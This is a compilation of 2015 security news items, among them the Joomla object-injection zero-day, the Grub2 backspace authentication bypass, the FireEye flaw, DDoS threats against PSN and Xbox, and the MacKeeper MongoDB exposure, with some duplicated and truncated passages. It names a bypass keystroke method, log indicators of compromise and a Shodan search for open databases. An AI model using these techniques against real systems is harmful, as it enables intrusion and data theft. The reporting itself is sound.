Bad Santa! Microsoft Offers — 'Upgrade now' or 'Upgrade tonight' to Push Windows 10
Many Windows 7 and Windows 8.1 users don't want to upgrade their machines to Microsoft’s newest Windows 10 operating system now or anytime soon. Isn't it?
But what if you wake up in the morning and found yourself a Windows 10 user?
That's exactly what Microsoft is doing to Windows 7 and 8.1 users.
Windows 10 Upgrade Becomes More Aggressive
Ever since Microsoft launched its new operating system over the summer, Windows 7 and 8.1 users have been forced several number of times to upgrade their machines to Windows 10.
It was relatively inoffensive at first, but as days have passed, Microsoft has become increasingly aggressive to push Windows users to upgrade to Windows 10.
Microsoft has left very little choice over whether to upgrade their systems to Windows 10 or not. At last, the users end up upgrading their machines to the latest Windows operating system.
Users now see a pop up on their computers, as InfoWorld reports, that displays only two choices for you:
Upgrade Now 'OR' Upgrade Tonight
But, What's the Catch?
Yes, there is a catch to get rid of Windows 10 upgrade, temporarily, anyways.
What users will see is the above two options but what they'll not see is the third option hiding in plain sight: The 'X' button in the top-right corner of the upgrade window.
Also Read: Reminder! If You Haven't yet, Turn Off Windows 10 Keylogger Now.
While you can click the 'X' button to make the upgrade go away, the less knowledgeable users would end up upgrading to Windows 10 either then and there or at that night.
Moreover, since the dialog box warns that "Upgrading to Windows 10 is Free for a Limited Time", some users could interpret that if they close the pop-up window, they may not be able to upgrade their machines Free at a later date.
Microsoft silently started pushing Windows 10 installation files on PCs running Windows 7 or Windows 8.1 over a month after its launch, even if users have not opted into the upgrade.
Almost two months ago, some Windows 7 and 8.1 users also claimed that Windows 10 had begun to install itself automatically on their PCs, which Microsoft later called it a mistake.
Although there is nothing we could predict what tweaks Microsoft has planned for future upgrades, the next time you may get a pop-up window with a single button that says "Upgrade Now."

19-Year-Old Teen Steals $150,000 by Hacking into Airline's Website
What do you do to earn up to $150,000?
Somebody just hacks into airlines and sells fake tickets.
That's exactly what a 19-year-old teenager did and made approximately 1.1 Million Yuan (£110,000 or $150,000) by hacking into the official website of an airline and using the stolen booking information to defraud hundreds of passengers.
The teenager, identified as Zhang from Heilongjiang, north-east China, hacked into a Chinese airline website and illegally downloaded 1.6 Million passengers bookings details, including:
Flight details
ID card numbers
Email addresses
Mobile phone numbers
Zhang then used this information to successfully defraud hundreds of customers by convincing them that there was some issue with their booking flights, and they had to pay extra fees, according to People's Daily Online.
Moreover, the hack caused the airline to lose almost 80,000 Yuan ($12,365 USD) as a result of customers requesting refunds.
The incident took place from 31 July to 20 August this year, and the suspect was arrested by the police on November in Dalian, north China.
A police officer said the hack was not highly sophisticated and was a result of a loophole in the airline's computer system. However, the name of the airline is not yet disclosed.

Phantom Squad wants to take down Playstation network and Xbox Live on Christmas

Playstation network and Xbox Live risk to be taken down on Christmas by an anonymous group of hackers known as the Phantom Squad.
If you remember, last Christmas, both PlayStation network and Xbox Live were took down by hackers belonging to the group of hackers known as Lizard Squad. It looks like this year this new tradition may continue, all because a group called. posted on twitter a message announcing their intentions of taken down again both PlayStation network and Xbox live, menacing to keep down the services for a week.

“We are going to shut down Xbox live and PSN this year on christmas. And we are going to keep them down for one week straight #DramaAlert”

Phantom Squad (@PhantomSqaud) December 9, 2015

We have no information on the group, but probably the group wants to gain popularity, and these targets during the Christmas represent a great opportunity.

If they succeed, they will get the attention they want.

The intent of the Phantom Squad is to demonstrate that “cyber security does not exist” in both gaming platforms.

Phantom Squad also said that both platforms are vulnerable to attacks, and they add that they were able to take down Xbox live during the weekend:

Phantom Squad tweet

Microsoft hasn’t confirmed the attack, but it confirmed that issues occurred in the Xbox live network on Saturday afternoon:

“We are currently investigating issues w/ signing in, managing friends, & matchmaking. Updates here while we work:,” said Microsoft’s XBox Support Twitter account.

As mention before, last Christmas, both platforms faced the same issue, the group Lizard Squad hit both networks with a powerful DDoS attack, the services provided by Sony and Microsoft were paralyzed for several days. After the attacks, an 18-year-old was arrested in the UK, on January 16th along with a 22-year-old Vincent Omari that was accused to be a member of the Lizard Squad group, but he always denied it and was released on bail.

Phantom Squad claims not be linked with Lizard Squad, and declared to be a group of Gray Hat hackers that like the popular Anonymous have declared war on the Islamic State group.

Elsio Pinto (@high54security) is at the moment the Lead McAfee Security Engineer at Swiss Re, but he also as knowledge in the areas of malware research, forensics, ethical hacking. He had previous experiences in major institutions being the European Parliament one of them. He is a security enthusiast and tries his best to pass his knowledge. He also owns his own blog McAfee Security Engineer at Swiss Re, but he also as knowledge in the areas of malware research, forensics, ethical hacking. He had previous experiences in major institutions being the European Parliament one of them. He is a security enthusiast and tries his best to pass his knowledge. He also owns his own blog McAfee Security Engineer at Swiss Re, but he also as knowledge in the areas of malware research, forensics, ethical hacking. He had previous experiences in major institutions being the European Parliament one of them. He is a security enthusiast and tries his best to pass his knowledge. He also owns his own blog

Hackers Plan to Ruin Christmas Eve for Millions of PlayStation and Xbox Live Gamers
Remember the notorious hacker group Lizard Squad that spoiled last Christmas holidays of many game lovers by knocking the PlayStation Network and Xbox Live offline with apparent Distributed Denial of Service (DDoS) attacks?
But, Will you be able to Play Xbox and PlayStation Game this Christmas?
Probably Not.
Because a new hacking group is threatening to carry out similar attacks by taking down the Xbox LIVE and PlayStation Network for a week during Christmas.
Be Ready this Christmas for Attacks on PSN and XBox LIVE
In a series of tweets, a bunch of DDoS hackers calling themselves "Phantom Group" (@PhantomSquad) announced that they will disrupt the XBox Live and PlayStation networks in a coordinated DoS attack.
The attacks could prevent millions of gamers worldwide from enjoying their newly opened Christmas gifts and accessing games online.
Also Read: PlayStation 4 Jailbreak Confirms.
Here are the tweets by Phantom Squad:
We are going to shut down Xbox live and PSN this year on Christmas. And we are going to keep them down for one-week straight #DramaAlert
Ok, think about this.... Xbox Live and PSN have millions upon millions of dollars... but do they use that money for better security?
No. PSN and Xbox do not use that money to improve their security... So until they open their eyes, Xbox Live and PSN will remain vulnerable.
Take Phantom Squad's Threats More Seriously
A few days ago, Phantom Squad claimed responsibility for knocking Reddit offline, and Reddit confirms that the issue, saying its databases coming "under extreme load" that could have been caused by a DDoS attack.
"Reddit #Offline Goodnight." — Phantom Squad tweeted on December 15, 2015.
Now, the group has turned its crosshairs toward the gaming networks.
However, neither Microsoft nor Sony responsible for managing PlayStation and XBox Live online networks respectively has confirmed the DDoS attacks, but Microsoft, at least, acknowledged issues with Xbox LIVE when Phantom Squad claimed responsibility.
"Xbox Live #Offline" — Phantom Squad tweeted on December 12, 2015.
As a proof, Phantom Squad also posted a video of its cyber attacks.

If the DDoS attack on PSN and XBox is carried out successfully for a week during Christmas, it will again ruin the Christmas holidays for millions of video game lovers worldwide, just like last year.
Since DDoS attacks are so easy to conduct nowadays when there are so many DDoS tools available online, the important point here is whether Microsoft and Sony have upgraded their DDoS defences enough to defend against the attacks.
So, What do you think about the declarations of war upon PSN and Xbox LIVE? Share your thoughts with us in the comments below.

Joomla under attack due to a zero-day. Patch your CMS now!

The websites based on the popular Joomla CMS need to be updated as soon as possible due to a critical remote code execution vulnerability.
The websites based on the popular Joomla CMS need to be updated as soon as possible, Joomla has just released a security patch to fix a critical eight-year-old remote code execution vulnerability. The critical flaw was already exploited in the wild, during the weekend experts at the Sucuri firm observed an alarming increase in the number of attacks.

According to the security expert Daniel Cid from Sucuri, starting from Saturday hundreds of attacks are now taking place.

“What is very concerning is that this vulnerability is already being exploited in the wild and has been for the last 2 days. Repeat: This has been in the wild as a 0-day for 2 days before there was a patch available.” States the blog post published by Sucuri.

“The wave of attacks is even bigger, with basically every site and honeypot we have being attacked [which] means that probably every other Joomla site out there is being targeted as well.”

The zero-day flaw could have a significant impact on the Internet users considering that Joomla is the most popular content management system having been downloaded more than 50 million times.

Joomla RCE

According to a security advisory published by Joomla, all versions above 1.5 are affected. It is important to update the CMS version to the patched version 3.4.6.

“Browser information is not filtered properly while saving the session values into the database which leads to a remote code execution vulnerability,” it says.

Sucuri is inviting users to protect their websites and looking for possible indicators od compromise. The attackers are running object injection through the HTTP user agent with exploits from the IP address,, and

“If you are a Joomla user, check your logs right away. Look for requests from or or as they were the first IP addresses to start the exploitation. I also recommend searching your logs for “JDatabaseDriverMysqli” or “O:” in the User Agent as it has been used in the exploits. If you find them, consider your Joomla site compromised and move to the remediation / incident response phase.” States Sucuri.

Don’t waste time, check log and update your Joomla version asap.

GCHQ Gaffer database goes open source

The British intelligence agency GCHQ has released the Gaffer database as an open source project.
Gaffer is sort of database written in Java that makes it “easy to store large-scale graphs in which the nodes and edges have statistics such as counts, histograms and sketches.”, its code is available for download on the code-sharing website Github.

“Gaffer is a framework that makes it easy to store large-scale graphs in which the nodes and edges have statistics such as counts, histograms and sketches. These statistics summarise the properties of the nodes and edges over time windows, and they can be dynamically updated over time.” states its description on the Github.

In reality the Gaffer is much more, it implements a framework for creating mass-scale databases, it is a powerful tool for the storage and analysis of the relationships between different pieces of data.

“Gaffer is a graph database, rather than a graph processing system. It is optimised for retrieving data on nodes of interest.” continues the description “Gaffer is distinguished from other graph storage systems by its ability to update properties within the store itself.”

The Gaffer implements features to carry out our several :

Allow the creation of graphs with summarised properties within Accumulo with a very less amount of coding.
Allow flexibility of stats that describe the entities and edges.
Allow easy addition of nodes and edges.
Allow quicker retrieval of data on nodes of interest.
Deal with data of different security levels – all data has a visibility, which is used to restrict who can access data based on their authorizations.
Support automatic age-off of data.
Gaffer is based on the Apache Accumulo that is a computer software project that developed a sorted, distributed key/value store based on the BigTable technology developed by Google.

Accumulo was created in 2008 by the US National Security Agency and it is released under the Apache 2.0 license.

Gaffer is distributed under the Apache 2.0 license that allows anyone to modify or distribute it.

GCHQ against pedophilies
Security experts speculate that Gaffer is used by the GCHQ for analyzing data related to a specific entity that could be a terrorist or any other element under investigation.
“Each node might be a surveilled terrorist or other source of data, and analysis of the graph might then show who or what is at the ‘center’ of that network,” said Andrii Degeler, a journalist at Ars Technica.

It is impossible to understand the motivation behind the release of the platform, but it is likely that the agency is trying to be attractive for young talents in the hacker community.
The GCHQ is currently working on Gaffer 2, as reported on Github:

“The version of Gaffer in this repo is no longer under active development because a project called Gaffer2 is in development. “

Press backspace 28 times to hack a Linux PC with Grub2

The researchers Hector Marco and Ismael Ripoll have found that the Grub2 authentication could be easily defeated by hitting backspace 28 times.
A couple of researchers from the University of Valencia’s Cybersecurity research group, Hector Marco and Ismael Ripoll, have found that the Grub2 bootloader is plagued by a serious vulnerability that can be exploited by hackers to bypass password protection and compromise the targeted computer.

Nothing of complex, the researcher discovered that by pressing backspace 28 times, it’s possible to bypass authentication during boot-up on some Linux systems.

The duo explained that the flaw affects the Grub2 bootloader which is currently used by a large number of Linux machines, including some embedded systems, for the boot loading at system startup.

The researchers explained in the advisory that hitting the backspace key 28 times at the Grub username prompt during power-up will defeat the authentication mechanism, the action triggers a “rescue shell” under Grub2 versions 1.98 (December, 2009) to 2.02 (December, 2015).

“Exploiting the integer underflow can be used to cause an Off-by-two or an Out of bounds overwrite memory errors.” states the advisory. “An attacker which successfully exploits this vulnerability will obtain a Grub rescue shell. Grub rescue is a very powerful shell allowing to:

Elevation of privilege: The attacker is authenticated without knowing a valid username nor the password. The attacker has full access to the grub’s console (grub rescue).
Information disclosure: The attacker can load a customized kernel and initramfs (for example from a USB) and then from a more comfortable environment, copy the full disk or install a rootkit.
Denial of service: The attacker is able to destroy any data including the grub itself. Even in the case that the disk is ciphered the attacker can overwrite it, causing a DoS.“
An attacker can exploit the rescue shell to load another environment that allows him to fully compromise the machine, for example by installing a rootkit.

The integer underflow vulnerability affects Grub2 since 2009 and resides in the

“The fault (bug) is in the code of Grub since version 1.98 (December, 2009). The commit which introduced the fault was
, affecting the
function.” continues the advisory.

Grub2 bomba

The duo also presented a proof-of-concept attack exploiting the flaw to inject a backdoor on the target system, fortunately, they have also released a fix that is available here.

Nový bezpečnostní cloud nabídne ochranu dat v reálném čase

17.12.2015 Ochrany
Řešení Private Security Network představila firma Kaspersky Lab. Její produkty mohou pomocí této sítě přijímat bezpečnostní údaje o aplikacích a webových stránkách v reálném čase, takže dokážou poskytnout extrémně rychlou ochranu před novými hrozbami bez nutnosti výměny dat s externími servery.

Při konvenčním způsobu trvá aktualizace databází bezpečnostních řešení obvykle pár hodin, cloud to zvládne během několika minut. Tento přístup také šetří výpočetní zdroje tím, že náročná analýza se vykonává v rámci cloudu.

Před tím, než bezpečnostní řešení obdrží zprávu o rizikovosti souboru či webu, potřebuje ale zaslat informace do cloudu. Pro některé obory podnikání nebo určité země to však není schůdné řešení.

Při konvenčním způsobu trvá aktualizace databází bezpečnostních řešení obvykle pár hodin, cloud to zvládne během několika minut. Tento přístup také šetří výpočetní zdroje tím, že náročná analýza se vykonává v rámci cloudu.

Před tím, než bezpečnostní řešení obdrží zprávu o rizikovosti souboru či webu, potřebuje ale zaslat informace do cloudu. Pro některé obory podnikání nebo určité země to však není schůdné řešení.

Private Security Network ale tuto slabinu podle výrobce obchází. Jde v podstatě o privátní cloud, který obsahuje interní kopii KSN (Kaspersky Security Network) -- databáze jsou nainstalované na serverech uvnitř informační infrastruktury samotného podniku namísto dosavadního modelu, kdy jsou servery s bezpečnostními daty umístěné v různých zemích.

Aktuální informace o hrozbách přicházejí do těchto databází z KSN prostřednictvím pravidelné jednosměrné synchronizace -- to znamená, že žádná data nejsou posílána z korporátní sítě do cloudu.

„V korporacích a státních institucích jsou obvykle velmi přísná pravidla informační bezpečnosti, regulující příchozí i odchozí datový provoz. Bezpečnostní řešení pracují nejefektivněji tehdy, když udržují nepřetržitou výměnu dat s cloudem, obsahujícím nejnovější údaje o hrozbách. Privátní bezpečnostní cloud umožní klientům využívat výhody Kaspersky Security Network v rámci jejich IT infrastruktury, a to plně v souladu s jejich požadavky a specifickými potřebami,“ řekl Nikita Shvetsov, technologický ředitel Kaspersky Lab.

N3XT — Advanced CHIP that Could Make Your Computer 1000 Times Faster
Researchers have come up with an all new way to revolutionize the standard computer chip that comes inbuilt in all our electronics.
Researchers from Carnegie Mellon, Stanford, and the University of California, Berkeley among others, have invented a new material that could replace the 'silicon' in conventional chips – built in all electronic devices – making the device's processing speed 1,000 times faster.
This means that the new chip made with nano-material could solve complex problems in a fraction of the time our computers take.
The brand new chip, dubbed Nano-Engineered Computing Systems Technology (N3XT), takes the landscape from a resource-heavy single-storey layout to an efficient 'Skyscraper' approach, claims a Rebooting Computing special issue of the IEEE Computer journal.
Silicon Chip – A Resource-Heavy Single-Storey Layout
The standard silicon chips currently used in all electronic devices have one major issue:
The silicon chips are arranged like standalone houses in the suburbs.
This means these chips are single-storeys in which each "house" in the neighbourhood are connected with wires that carry digital data.
The drawback of silicon chips is that the data in these chips travels longer distances and wastes energy, often causing digital traffic jams while processing.
N3XT Chip – Skyscraper Approach is 1000 Times Faster

N3XT chips that are made from carbon nanotube transistors are tiny cylindrical molecules of carbon that efficiently conduct heat and electricity.
The N3XT model splits processors and memory into, say, different 'floors' in a skyscraper.
All those floors are then connected by millions of tiny electronic elevators, called 'vias,' that are used to transport data between chips.
The big advantage of Skyscraper approach – data moves much faster, and more efficiently over shorter distances (vertically) than across a larger area (horizontally) like in current silicon chips.
"When you combine higher speed with lower energy use, N3XT systems outperform conventional approaches by a factor of a thousand," said H. -S. Philip Wong, the Professor, who authored the paper.
Another Advantage of N3XT Over Silicon Chip
Another advantage of Skyscraper chips over Silicon chips is that:
Silicon chip cannot be piled on top of each other like in N3XT chip, because, during fabrication silicon chip gets extremely hot (almost 1,000 degrees centigrade) that ends up damaging the layers below.
Whereas the N3XT chip can be fabricated at much lower temperatures than silicon chip, so it can easily be layered without damaging the stacks below.
It sounds like an entirely different approach to computer memory and, of course, this kind of computing knowledge is new to me. But, it's interesting to know that the approach could bring a macro-level revolution in chip architecture that took place more than a century ago.
You can just check out the original report at Stanford News for more details and let me know what's your take on it.

Hacker claims Sony PlayStation 4 Jailbreak

The dream comes true for many Sony PlayStation 4 users, a hacker has developed a Jailbreak for the popular armored console.
The Sony PlayStation 4 is considered one of the most protected platform, since now it was impossible to run pirated games, but a hacker who calls himself CTurt claimed to develop a fully jailbroken version of the PlayStation 4 with the help of a kernel exploit that he previously created.

sony playstation 4

CTurt exploited the hack in PlayStation 4 v1.76 to inject malicious code in the PS4 and gain control of the gaming platform.

“Just broke WebKit process out of a FreeBSD jail (cred->cr_prison = &prison0). Guess you could say the PS4 is now officially “jailbroken” :P” states a Tweet sent by CTurt.

play station 4 jailbreak

According to the above message, currently the exploit only works for PlayStation 4 firmware version 1.76, but the expert believes that it can be modified to work for more recent firmware.
How does it work?

According to the hacker, the jailbreak allows dumping of the Sony PlayStation 4 RAM from other processes and allows the installation of a custom firmware, which could be exploited by hackers to run homebrew applications that aren’t normally not allowed by the security restriction implemented by Sony.

“While it could take time before CTurt and other hackers are able to develop custom firmware along with the method to load it on the video game console, it should be noted that the exploit can also be taken advantage of to have the console run pirated software.” reported

Clearly it the news will be confirmed we will observe a huge impact on the gaming market.

Which will be the reply of the Sony?
Obviously, the company will analyze the exploit in order to discover the vulnerabilities exploited by the hacker and fix them for the most recent version of Play Station 4 firmware.

Twitter warns victims of state-sponsored attacks

Twitter has notified some of its users that they may have been targeted in an attack by state-sponsored hackers.
Twitter is warning users of state-sponsored cyber attacks, a small number of users, including a few connected to security and privacy advocacy, have been notified that their accounts were targeted by nation-state hackers.

The Twitter users received the notifications in the inboxes, the warning messages started a couple of days ago.

Twitter informed its users that hackers, likely associated with “a government,” were trying to compromise their account. The attackers were trying to steal users’ information, including email addresses, IP addresses and phone numbers linked to accounts.

“We believe that these actors (possibly associated with a government) may have been trying to obtain information such as email addresses, IP addresses and/or phone numbers,” Twitter said in its notification.

“At this time, we have no evidence they obtained your account information, but we’re actively investigating this matter,” “We wish we had more we could share, but we don’t have any additional information we can provide at this time.”

According to Motherboard, coldhack, a Canadian “nonprofit dedicated to furthering privacy, security and freedom of speech,” first twitted about the mysterious notification.

Twitter Account-Hacked

Colin Childs, one of the founding directors of coldhak, is a contractor for Tor Project , this could be a possible motivation for the alleged attack.

Another user of the popular platform that received the notification is Runa Sandvik, a privacy and security researcher and a former Tor Project member.

Twitter reported that targeted users belong organizations like the Electronic Frontier Foundation and Tor Project.

Ironically, the company is recommending the use of Tor to protect online privacy, because Twitter was accused in the past of blocking users who accessed its website via anonymizing networkand forcing them to verify their accounts by providing phone numbers.
It is the first time that Twitter warns its users of targeted attacks, in October Facebook launched a similar initiative warning its users of nation-state attacks. Back 2012, Google launched it notification service.

It is not clear how both Twitter and Facebook attribute the attacks to alleged state-sponsored attacks, in the case of the Twitter’s warnings it is not clear if the popular platform was hacked whether the accounts were targeted individually.

FireEye Appliances affected by a critical flaw simply exploitable

Security experts at the Google Project Zero team have discovered a critical flaw in FireEye appliances that could be exploited via email.
A remote code execution vulnerability dubbed “666” affect FireEye Appliances, hackers can exploit the flaw simply by sending an email or tricking users into clicking on a link.

The 666 vulnerability resided in a module designed to analyze Java Archive (JAR) files, so the attacker can exploit it by sending a specially crafted JAR file across a network protected by FireEye appliances. The flaw has been coded “666” because of its ID in the Project Zero bug tracker.

This is possible by sending an email containing such a JAR file to the targeted organization, be aware because it is worth noting that the email would not have to be read for the malicious code to get executed because the appliances analyze the JAR archive anyway.

In the alternative, the attacker can share with someone in the organization a link pointing to a crafted JAR file. FireEye appliances automatically scan for files circulating in the network, but the same behavior could be exploited to trigger the RCE vulnerability without user interaction.

FireEye appliances Zero-day

“The FireEye MPS (Malware Protection System) is vulnerable to a remote code execution vulnerability, simply from monitoring hostile traffic. FireEye is designed to operate as a passive network tap, so that it can see all the files and emails that enter a monitored network.” States the advisory published by the Project Zero. “This vulnerability allows an attacker to compromise the FireEye device, get a root shell and start monitoring all traffic on the victim network (emails, attachments, downloads, web browsing, etc). This is about the worst possible vulnerability that you can imagine for a FireEye user, it literally does not get worse than this.”

FireEye appliances are used by enterprise to monitor internal networks, they are able to monitor FTP, HTTP, SMTP and other protocols searching for potential threats.

The exploitation of the flaw could allow attackers to compromise networks protected by the security products.

This made it possible for the RCE vulnerability found by Google researchers to be exploited without user interaction.

Earlier this month, the researchers Tavis Ormandy and Natalie Silvanovich from the Google Project Zero announced the discovery of the critical flaw.

Frey immediately worked to fix the security issue reported by the hackers.

The experts announced last week that they had developed a reliable exploit for a remote code execution (RCE) vulnerability affecting FireEye’s Malware Protection System (MPS).

“Because FireEye devices typically have a secondary internet-connected interface for updates and management, the issue could even be wormable across the internet,” Ormandy explained.

Of course, they avoided providing further technical details, but Ormandy noted on Twitter that the bug likely affected “every version ever shipped.”

According to Tavis Ormandy and Natalie Silvanovich, the issue affected FireEye’s Network Security (NX), Email Security (EX), Malware Analysis (AX), and File Content Security (FX) products. The experts at FireEye promptly patched the remote code execution (RCE) vulnerability within two days even they issued a temporary workaround within hours.

FireEye released the security content version 427.334.

The flaw discovered by the Google Project Zero team is unique, the experts also discovered a privilege escalation vulnerability that could have been exploited to obtain root access to a FireEye device.

The details of this second flaw have not been disclosed because the vendor is still working on a permanent fix.

The joint exploitation of the two flaws could allow the a threat actor to compromise the internal network by deploying a stealth rootkit on the affected appliance and syphon sensitive data from the targeted host.

Top 10 — 2016 New Year's Resolutions for Cyber Security Professionals
Billions of dollars are spent in securing business operations, and yet attackers still find ways to breach a network.
With the ever increasing growth in security attacks across all threat vectors, you should consider these New Year’s resolutions to help solve your security challenges in 2016:
Take stock of what you have
Segment your Network
Setup controls with ACLs
Secure protocols, network ports, & services
Monitor account activity
Monitor servers & databases
Make sure that your applications are secured
Ensure security policies are in place
Measure effectiveness and ensure your security products are doing their job
Add threat intelligence into your security operations
As you prepare for 2016 and reflect on all the security news stories from this year, these ten resolutions need to be on your “to-do” list:
1. Take stock of what you have
Knowing the genetic makeup of your environment is the key to securing your IT systems. It is critical to have an updated inventory of your systems, applications, and network devices as you cannot secure what you do not know about.
If you are starting up for the first time, you can use discovery inventory tools to create that initial inventory.
You should also consider using continuous discovery tools to identify what is connected to your private or internal network and what is connected to the public network or Internet.
As a best practice, you should use your inventory list and create device groups so that you can identify authorized users that perform critical tasks.
Eventually, feeding this information into a Security Information and Event Management (SIEM) product would help you to identify unauthorized access and mitigate threats before they become attacks.
2. Segment your Network
Managing network traffic and allocating bandwidth are typically seen as the main purposes of network segmentation, so some security aspects are often overlooked.
Adding new applications and making changes in the existing devices can drastically impact the security of your networks.
With proper segmentation in place, you will be able to apply appropriate security measures.
For example, the network that handles employees’ personal information and compensation details could be clearly marked off from your financial activities.
The key factors to consider when segmenting your networks should include:
knowledge of where your sensitive data resides
what applications and services your users need access to
capabilities of existing devices to implement segmentation
regulatory demand
how you will identify and respond when someone attempts to cross these boundaries
Based on this information you can allocate user and device permissions. Once you segment your networks based on required access, it will become easier for you to visualize how your devices interact across different segments and to identify suspicious activity.
3. Setup controls with Access Control Lists
Your firewalls and routers will permit or restrict data flow based on your ACLs. Ideally, you should be building your access control lists (ACLs) based on user need and in-line with your segmentation polices.
You need to identify what type of the controls are necessary for your applications and users.
With proper external ACLs, you could control IP spoofing in outbound and incoming traffic. For example, if incoming traffic shows an IP that falls within your organization’s IP range, then it is suspicious. Similarly, if outbound traffic shows an IP that does not fall in your IP range, then you have every reason to suspect a black cat.
You can make good use of your IP whitelists using your firewalls and routers and telling them how to handle incoming and outgoing traffic.
4. Secure protocols, network ports, & services
Whether it’s sensitive personal information or financial data, the demand for security of electronic communication is high for both private and business use.
To protect and keep your data secure, you need to secure your application, transport, network, and data link layers.
To ensure the availability of your critical business services, monitor your endpoints and detect traffic over restricted services, ports and protocols to mitigate malicious activities like:
malware infections that could enter via removable devices like USBs
unauthorized port scans, as attackers use this method often to gain entry into your network
Communicate best practices to your users and let them know what is acceptable and what is not - especially in terms of using BYOD, transferring files, and using VPNs.
5. Monitor account activity
Access rights to your devices need to be controlled and monitored. Apply the concept of least privilege enforcement to avoid abuse of privileges.
It is highly recommended that you monitor accounts that are given administrative privileges and set rules to log automatically off or disable that account if it is used for performing unauthorized activities.
For example, administrators can create local accounts with local administrative privileges. This is something an attacker or malicious insider would do to ensure they can retain access, even if they lose their privileged credentials.
Privileged accounts can, if unmanaged, lead to lack of accountability and increase your chances of credential theft. Stolen credentials lead to compromised networks which affect your customers, vendors, employees and eventually lead to loss of reputation.
6. Monitor servers & databases
Maintaining the integrity of sensitive information is vital. Keep track of changes made to files that contains business critical information or system data.
Since attackers like to modify local files or registry settings so they can embed themselves, monitor these changes. Correlate file audit events with user activity and system changes to thwart an attack.
7. Ensure security policies are in place
When regulatory agencies come up with compliance policies and procedures, they are trying to help you know how to defend attacks while also building customer confidence in doing business with your organization.
In reality, compliance standards will help you to identify ways to improve your IT infrastructure and act as a basis for your corporate security strategy.
For example, you should have clear internal policies when employees use their personal devices at work or when they use office devices/laptops at home.
These policies can help you prevent rogue users and devices from tampering with your data and network. In the case of mishaps, you should be able to take immediate action - remotely/automatically with your endpoint monitoring systems.
Implement change management for configurations of hardware and software on laptops, workstations, servers and network devices, to prevent policy violations and mistakes.
8. Make sure that your applications are secured
Patches are meant to plug security holes. You need to keep your systems patched with latest updates from vendors so that you do not have known vulnerabilities that could create unwanted issues.
Attackers find their targets based on known vulnerabilities - so if patches are not applied on time, you may be making yourself an easy target.
You should have a good patch management strategy in place to protect your environment from threats and unwanted malware that could result in a security breach.
9. Measure effectiveness and ensure your security products are doing their job
It has become an imperative to use multiple security systems like anti-virus & IDP/IDS.
Each of these systems is specialized and perform specific security functions. But, they operate in silos that could create gaps in data correlation and leave your organization vulnerable.
So, how do you measure overall effectiveness and ensure that your security products are working as expected?
Consider using a SIEM with continuous log monitoring capabilities so you can monitor and consolidate logs from all devices centrally and help ensure overall security of your environment.
Besides acting as a preventive measure, log monitoring also comes in handy for performing forensic analysis, in the case of a security incident.
10. Add Threat intelligence into your security operations
Threat intelligence data can help turn noise into actionable information to respond to attacks before a breach occurs.
Leverage this information with real-time event correlation to protect your environment from known bad actors.
As a best practice, send threat intelligence feeds into your SIEM since it’s the best solution for collecting, consolidating, and analyzing all of your log data and threat intelligence in one place.
A SIEM will help you detect attacks faster. Your SIEM should be able to alert you if it gets a match between threat intelligence (let’s say a bad actor IP address or URL) and what it is happening on your network.
Get Help Implementing These New Year’s Resolutions
If you need help with these 2016 New Year’s Resolutions, you really should check out these security products by SolarWinds.
For example, their Log & Event Manager is easy to use SIEM that comes with:
Log management,
automated security monitoring,
file integrity monitoring,
endpoint monitoring,
real-time event correlation,
And Threat intelligence with active response capabilities.
You can perform forensic analysis and look for specific data across monitored devices with powerful searches:
With Log & Event Manager you can:
Gain key insight into critical activities and improve security, stay compliant, and solve problems in a single virtual appliance.
Turn log data into real-time intelligence with in-memory event correlation and detect suspicious activities before it could harm your environment.
Automatically respond to security threats and known bad actors with built-in active responses, which requires no scripting.
Perform security audits and demonstrate compliance with predefined rules, templates and out-of-the-box reports.
Try Log & Event Manager - Download a free 30-day trial and have it up and running in less than an hour.

British Intelligence Open-Sources its Large-Scale Graph Database Software
UK's Secretive Spy Agency Government Communications Headquarters (GCHQ) has open-sourced one of its tools on code-sharing website GitHub for free...
A graph database called 'Gaffer.'
Gaffer, written in Java, is a kind of database that makes it "easy to store large-scale graphs in which the nodes and edges have statistics such as counts, histograms and sketches."
Github is a popular coding website that allows software developers to build their project on a single platform equipped with all the requirements that are gone in the making of a software.
Gaffer and its Functionalities
In short, Gaffer is a framework for creating mass-scale databases, to store and represent data, and is said to be useful for tasks including:
Allow the creation of graphs with summarised properties within Accumulo with a very less amount of coding.
Allow flexibility of stats that describe the entities and edges.
Allow easy addition of nodes and edges.
Allow quicker retrieval of data on nodes of interest.
Deal with data of different security levels – all data has a visibility, which is used to restrict who can access data based on their authorizations.
Support automatic age-off of data.
Gaffer actually uses the Apache Accumulo codebase that was originally open-sourced by the US National Security Agency (NSA) and is released under the Apache 2.0 licence.
Why GCHQ Open Sourced its Code?
It's pretty unusual for one of the most secretive intelligence agencies to release computer code online for anyone to use for free.
Because GCHQ is very well known for monitoring communications worldwide and is not at all expected to release its database types open source on GitHub.
However, maybe this GCHQ's move is part of its effort toward becoming friendlier in the hacker community and to attract new talents.
The spy agency also says that it is already started working on Gaffer2, a project the agency aims to take "the best parts of Gaffer... to create a more general purpose graph database system."
What do you think about this GCHQ's move? Feel free to tell us by hitting the comments below.

13 Million MacKeeper Users Hacked — 21 GB of Data Exposed
13 Million MacKeeper Users Hacked — 21 GB of Data Exposed
MacKeeper anti-virus company is making headlines today for its lax security that exposed the database of 13 Million Mac users' records including names, email addresses, usernames, password hashes, IP addresses, phone numbers, and system information.
MacKeeper is a suite of software that claims to make Apple Macs more secure and stable, but today the anti-virus itself need some extra protection after a data breach exposed the personal and sensitive information for Millions of its customers.
The data breach was discovered by Chris Vickery, a white hat hacker who was able to download 13 Million customer records by simply entering a selection of IP addresses, with no username or password required to access the data.
21 GB Trove of MacKeeper Customer Data Leaked
31-year-old Vickery said he uncovered the 21 GB trove of MacKeeper customer data in a moment of boredom while searching for openly accessible databases on Shodan – a specialized search engine that looks for virtually anything connected to the Internet – that require no authentication.
"The search engine at had indexed their IPs as running publicly accessible MongoDB instances (as some have already guessed)," Vickery said in a Reddit post. "I had never even heard of MacKeeper or Kromtech until last night. I just happened upon it after being bored and doing a random "port:27017" search on Shodan."
As a result, four IP addresses took him straight to a MongoDB database, containing a range of personal information, including:
Customer Names
Email addresses
Password hashes
Mobile phone numbers
IP addresses
System information
Software licenses and activation codes
Security Product Using Weak Algorithm to Hash Passwords
Although the passwords were encrypted, Vickery believes that MacKeeper was using weak MD5 hashes to protect its customer passwords, allowing anyone to crack the passwords in seconds using MD5 cracking tools.
The company responded to the issue after Vickery posted it on Reddit, saying that the company had no evidence the data was accessed by malicious parties.
"Analysis of our data storage system shows only one individual gained access performed by the security researcher himself," Kromtech, the maker of MacKeeper, said in a statement. "We have been in communication with Chris, and he has not shared or used the data inappropriately."
